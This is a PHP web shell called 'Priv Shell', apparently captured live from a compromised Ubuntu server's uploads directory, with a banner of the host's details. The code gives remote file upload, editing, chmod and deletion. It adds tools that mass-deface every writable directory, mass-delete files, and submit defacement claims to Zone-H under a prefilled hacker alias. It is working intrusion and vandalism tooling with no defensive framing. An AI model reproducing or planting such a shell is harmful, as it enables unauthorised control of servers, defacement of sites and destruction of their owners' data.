| Server IP : 13.213.54.232 / Your IP : 216.73.216.134 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ip-172-31-17-110 6.8.0-1029-aws #31~22.04.1-Ubuntu SMP Thu Apr 24 21:16:18 UTC 2025 x86_64 User : www-data ( 33) PHP Version : 7.1.33-67+ubuntu22.04.1+deb.sury.org+1 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/dashboard/uploads/ |
Upload File : |
<?php
function fsize($file) {
$a = ["B", "KB", "MB", "GB", "TB", "PB"];
$pos = 0;
$size = filesize($file);
while ($size >= 1024) {
$size /= 1024;
$pos++;
}
return round($size, 2) . " " . $a[$pos];
}
if (isset($_GET['dir'])) {
$path = $_GET['dir'];
chdir($path);
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$exdir = explode('/', $path);
$paths = $exdir;
if (isset($_POST['newFolderName'])) {
if (mkdir($path . '/' . $_POST['newFolderName'])) {
echo "Create Folder Successfully!";
} else {
echo "Create Folder Failed";
}
}
if (isset($_POST['newFileName']) && isset($_POST['newFileContent'])) {
if (file_put_contents($_POST['newFileName'], $_POST['newFileContent'])) {
echo "Create File Successfully!";
} else {
echo "Create File Failed";
}
}
if (isset($_POST['newName']) && isset($_GET['item'])) {
if ($_POST['newName'] == '') {
echo "You miss an important value";
}
if (rename($_GET['item'], $_POST['newName'])) {
echo "Rename Successfully!";
} else {
echo "Rename Failed";
}
}
if (isset($_POST['newContent']) && isset($_GET['item'])) {
if (file_put_contents($_GET['item'], $_POST['newContent'])) {
echo "Edit Successfully!";
} else {
echo "Edit Failed";
}
}
if (isset($_POST['newPerm']) && isset($_GET['item'])) {
if ($_POST['newPerm'] == '') {
echo "You miss an important value";
}
if (chmod($_GET['item'], $_POST['newPerm'])) {
echo "Change Permission Successfully!";
} else {
echo "Change Permission Failed";
}
}
if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['item'])) {
if (is_dir($_GET['item'])) {
if (rmdir($_GET['item'])) {
echo "Delete Successfully!";
} else {
echo "Delete Failed";
}
} else {
if (unlink($_GET['item'])) {
echo "Delete Successfully!";
} else {
echo "Delete Failed";
}
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Priv Shell <?= $_SERVER['SERVER_NAME'] ?></title>
<style>
body {
font-size: 9px;
color: white;
width: 100%;
height: 100%;
background-color: black;
}
h1 {
color: gold;
text-shadow:1px 1px red;
text-align:center;
}
.intro {
font-size: 15px;
width:100%;
padding-left:6px;
padding-bottom:5px;
margin-bottom: 4px;
padding-right: 30px;
border-bottom:2px solid #db0303;
}
.tools {
width:100%;
padding-right:35px;
text-align:center;
padding-bottom: 4px;
border-bottom:2px solid #b80000;
}
.tools a:first-child {
background-color:#2d2a2a;
padding:3px;
border-right:2px solid black;
}
.tools a:nth-child(2) {
background-color:#2d2a2a;
padding:3px;
border-right:2px solid black;
}
.tools a:last-child {
background-color:#2d2a2a;
padding:3px;
border-right:2px solid black;
}
.file-uploader {
font-size: 15px;
margin-top:5px;
padding-top: 5px;
}
.file-uploader a:first-child {
text-align:left;
}
.file-uploader a:last-child {
text-align:left;
}
.file-uploader, button {
text-align:left;
}
form {
margin-top;20px;
margin-bottom: 10px;
text-align:left;
}
table {
width: 110vh;
height: 115%;
border-radius:5px;
background-color:black;
margin: 5px;
}
th, td {
margin-top:5px;
padding: 8px;
text-align: center;
}
th {
background-color: #333;
color: white;
border-radius:5px;
}
th:nth-child(1) {
background-color: #383232;
border-right:2px solid black;
}
th:nth-child(2) {
background-color: #383232;
width:10%;
border-right: 2px solid black;
}
th:nth-child(3) {
background-color: #383232;
width:10%;
border-right: 2px solid black;
}
th:nth-child(4) {
background-color: #383232;
border-right: 2px solid black;
}
th:nth-child(5) {
background-color: #383232;
border-right: 2px solid black;
}
a {
text-decoration: none;
text-align: left;
color: white;
cursor: pointer;
}
select {
width: 60px;
height: 20px;
border-radius: 5px;
}
.table-container {
overflow-x: auto;
width: 101%;
margin-top:5px;
padding-right:20px;
border:1px solid #b80000;
border-radius:5px;
max-width: 150%;
}
</style>
</head>
<body>
<div class="intro">
<h1>Priv Shell</h1>
uname: <?= php_uname() ?><br>
Soft: <?= $_SERVER['SERVER_SOFTWARE'] ?><br>
IP: <?= !@$_SERVER['SERVER_ADDR'] ? ($_SERVER['SERVER_NAME']) : @$_SERVER['SERVER_ADDR'] ?><br>
Port: <?= $_SERVER['SERVER_PORT'] ?><br>
Path:<?php
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
echo '<a href="?dir=/">/</a>';
continue;
}
if ($pat == '') continue;
$pathUrl = implode('/', array_slice($paths, 0, $id + 1));
echo '<a href="?dir=' . $pathUrl . '">' . $pat . '</a>/';
}?>
</div>
<div class="tools">
<?php
$tools = isset($_GET['tools']) ? $_GET['tools'] : '';
if ($tools == 'zone-h') {
if ($_POST['submit']) {
$domain = explode("\r\n", $_POST['url']);
$nn = $_POST['nn'];
echo "<font color='white'>Defacer Onhold:</font> <a href='http://www.zone-h.org/archive/notifier=$nn/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nn/published=0</a><br>";
echo "<font color='white'>Defacer Archive:</font> <a href='http://www.zone-h.org/archive/notifier=$nn' target='_blank'>http://www.zone-h.org/archive/notifier=$nn</a><br><br>";
function zoneh($url, $nn)
{
$ch = curl_init("http://www.zone-h.com/notify/single");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
return curl_exec($ch);
curl_close($ch);
}
foreach ($domain as $url) {
$zoneh = zoneh($url, $nn);
if (preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
echo "<font color='white'>$url -> </font><font color=green>OK</font><br><br>";
} else {
echo "<font color='white'>$url -> </font><font color=red>ERROR</font><br><br>";
}
}
} else {
echo "<center>
<font size='7' color='red' face='Orbitron'>Zone-H Mass Notify</font><br>";
echo "<form method='post'>
<input style='width: 350px;' type='text' name='nn' placeholder='Defacer' value=Mr.D3str0y3r><br><br>
<textarea style='width: 350px;' placeholder='http://zone-xsec.com/' name='url'></textarea><br><br><input class='tombol' type='submit' name='submit' value='Submit'>
</form>";
}
} elseif ($tools == 'massdeface') {
if ($_GET['tools'] == 'massdeface') {
function mass_type($dir, $filename, $script_content)
{
if (is_writable($dir)) {
$items = scandir($dir);
foreach ($items as $item) {
$item_path = "$dir/$item";
$location = $item_path . '/' . $filename;
if ($item === '.' || $item === '..') {
file_put_contents($location, $script_content);
} elseif (is_dir($item_path)) {
if (is_writable($item_path)) {
echo "Done > $location\n";
file_put_contents($location, $script_content);
mass_type($item_path, $filename, $script_content);
}
}
}
}
}
function normal_type($dir, $filename, $script_content)
{
if (is_writable($dir)) {
echo "Done > $dir/$filename\n";
file_put_contents("$dir/$filename", $script_content);
}
}
if ($_POST['start']) {
echo "[ <a href='?dir=$path'>Back</a> ]
<textarea class='form-control' rows='7' disabled=''>";
if ($_POST['type'] == 'mass') {
mass_type($_POST['directory'], $_POST['file'], $_POST['script']);
} elseif ($_POST['type'] == 'normal') {
normal_type($_POST['directory'], $_POST['file'], $_POST['script']);
}
echo "</textarea><br/>";
} else {
echo "<form method='post'>
<center>
<h5>Type :</h5>
<input id='toggle-on' class='toggle toggle-left' name='type' value='normal' type='radio' checked>
<label for='toggle-on' class='butn'>Normal</label>
<input id='toggle-off' class='toggle toggle-right' name='type' value='mass' type='radio'>
<label for='toggle-off' class='butn'>Mass</label>
</center>
<h5>Location :</h5>
<input type='text' name='directory' value='$path' class='form-control'><br>
<h5>File Name :</h5>
<input type='text' name='file' autocomplete='off' placeholder='[Ex] index.php' class='form-control'><br/>
<h5>File Content :</h5>
<textarea name='script' class='form-control' rows='5' autocomplete='off' placeholder='[Ex] Hacked By {Mr.D3str0y3r}'></textarea><br/>
<input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>
</form>";
}
exit;
}
} elseif ($tools == 'massdelete') {
if($_GET['tools'] == 'massdelete') {
function delete_mass($dir, $filename) {
if(is_writable($dir)) {
$items = scandir($dir);
foreach($items as $item) {
$item_path = "$dir/$item";
$location = $item_path . '/' . $filename;
if($item === '.') {
if(file_exists("$dir/$filename")) {
unlink("$dir/$filename");
}
} elseif($item === '..') {
if(file_exists("".dirname($dir)."/$filename")) {
unlink("".dirname($dir)."/$filename");
}
} else {
if(is_dir($item_path)) {
if(is_writable($item_path)) {
if($location) {
echo "$location > Deleted\n";
unlink($location);
$massdel = delete_mass($item_path, $filename);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "[ <a href='?dir=$path'>Back</a> ]
<textarea class='form-control' rows='7' disabled=''>";
delete_mass($_POST['directory'], $_POST['file']);
echo "</textarea><br/>";
} else {
echo "<form method='post'>
<h5>Location :</h5>
<input type='text' name='directory' value='$path' class='form-control'><br>
<h5>File Name :</h5>
<input type='text' name='file' autocomplete='off' placeholder='[Ex] index.php' class='form-control'><br>
<input type='submit' name='start' value='Delete!!' class='btn btn-danger form-control'>
</form>";
}
exit;
}
}
?>
<a href="?tools=zone-h">Zone-H</a>
<a href="?tools=massdeface">Mass Deface </a>
<a href="?tools=massdelete">Mass Delete</a>
</div>
<div class="file-uploader">
<?php
if (isset($_POST['uploadBtn'])) {
if (!empty($_FILES['fileUpload']['name'])) {
$uploadedFile = $_FILES['fileUpload'];
$newFilePath = $path . '/' . basename($uploadedFile['name']);
if (move_uploaded_file($uploadedFile['tmp_name'], $newFilePath)) {
echo "File Upload Successful!<br>";
} else {
echo "File Upload Failed!<br>";
}
} else {
echo "No file selected for upload.<br>";
}
} ?>
<form method="post" enctype="multipart/form-data">
<input type="file" name="fileUpload" id="fileUpload" required>
<button type="submit" name="uploadBtn">Upload File</button>
</form>
<a href="?dir=<?= $path ?>&action=createFolder">[ Create Folder ]</a>
<a href="?dir=<?= $path ?>&action=createFile">[Create File ]</a>
</div>
<div class="main">
<?php if (isset($_GET['action']) && $_GET['action'] == 'createFolder') : ?>
<form method="post" enctype="multipart/form-data">
<label for="newFolderName">New Folder Name:</label>
<input type="text" name="newFolderName" required>
<button type="submit">Create Folder</button>
</form>
<?php elseif (isset($_GET['action']) && $_GET['action'] == 'createFile') : ?>
<form method="post">
<label for="newFileName">New File Name:</label>
<input type="text" name="newFileName" required><br>
<label for="newFileContent">File Content:</label>
<textarea name="newFileContent" required></textarea><br>
<button type="submit">Create File</button>
</form>
<?php endif; ?>
<?php
// Forms for specific actions
if (isset($_GET['action']) && $_GET['action'] == 'rename' && isset($_GET['item'])) :
?>
<form action="" method="post">
<label for="newName">New Name:</label>
<input type="text" name="newName" value="<?= $_GET['item'] ?>" required>
<button type="submit">Submit</button>
<button type="button" onclick="history.go(-1)">Back</button>
</form>
<?php elseif ($_GET['action'] == 'edit' && isset($_GET['item'])) : ?>
<form action="" method="post" onsubmit="closeForm()">
<label for="newContent"><?= $_GET['item'] ?>:</label>
<textarea name="newContent" rows="8" required><?= htmlspecialchars(file_get_contents($path . '/' . $_GET['item'])) ?></textarea>
<button type="submit">Submit</button>
<button type="button" onclick="history.go(-1)">Back</button>
</form>
<script>
function closeForm() {
alert("Form submitted! Closing the form.");
window.close();
}
</script>
<?php elseif ($_GET['action'] == 'chmod' && isset($_GET['item'])) : ?>
<form action="" method="post">
<label for="newPerm"><?= $_GET['item'] ?> Permissions:</label>
<input type="text" name="newPerm" value="<?= substr(sprintf('%o', fileperms($path . '/' . $_GET['item'])), -4) ?>" required>
<button type="submit">Submit</button>
<button type="button" onclick="history.go(-1)">Back</button>
</form>
<?php endif; ?>
<div class="table-container">
<table>
<tr>
<th>Name</th>
<th>Type</th>
<th>Size</th>
<th>Permission</th>
<th>Time</th>
<th>Actions</th>
</tr>
<?php
$dirs = scandir($path);
foreach ($dirs as $dir) {
if ($dir != '.' && $dir != '..') {
echo "<tr>";
echo "<td><a href=\"?dir={$path}/{$dir}\">{$dir}</a></td>";
echo "<td>" . mime_content_type($dir) . "</td>";
echo "<td>" . fsize($dir) . "</td>";
echo "<td>" . substr(sprintf('%o', fileperms($dir)), -4) . "</td>";
echo "<td>" . date("Y-m-d H:i:s", filemtime($path . '/' . $dir)) . "</td>";
echo "<td><select onchange=\"location = this.value;\">
<option value=\"#\">Menu</option>
<option value=\"?dir={$path}&action=edit&item={$dir}\">Edit</option>
<option value=\"?dir={$path}&action=rename&item={$dir}\">Rename</option>
<option value=\"?dir={$path}&action=delete&item={$dir}\">Delete</option>
<option value=\"?dir={$path}&action=chmod&item={$dir}\">Chmod</option>
</select></td>";
echo "</tr>";
}
}
?>
</table>
</div>
</div>
</body>
</html>